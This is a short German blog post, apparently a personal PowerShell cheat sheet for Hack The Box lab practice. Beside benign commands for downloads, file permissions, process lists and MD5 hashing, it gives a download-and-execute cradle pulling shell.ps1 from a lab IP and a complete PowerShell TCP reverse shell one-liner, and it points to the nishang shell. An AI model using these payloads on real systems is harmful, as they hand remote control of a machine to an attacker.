Powershell Cheat Sheet (HTB)

WIP Cheat Sheet für PowerShell Befehle welche ich immer mal wieder (u.a. im Zusammenhang mit HTB benötige)

Datei über Powershell downloaden und ausführen

"powershell.exe "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"

Powershell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.15.36",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Am besten verwendet man jedoch gleich die nishang shell (wird jedoch vom Windows Defender geblockt)

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1

Datei Downloaden und speichern

wget "http://www.contoso.com" -outfile "file"




Datei und Ordner Berechtigungen anzeigen

Get-Acl -Path C:\temp | Format-List
dir | get-acl

aktive Prozesse anzeigen

Get-Process

MD5 Hashsumme von Datei erzeugen

CertUtil -hashfile <path to file> MD5

Schreibe einen Kommentar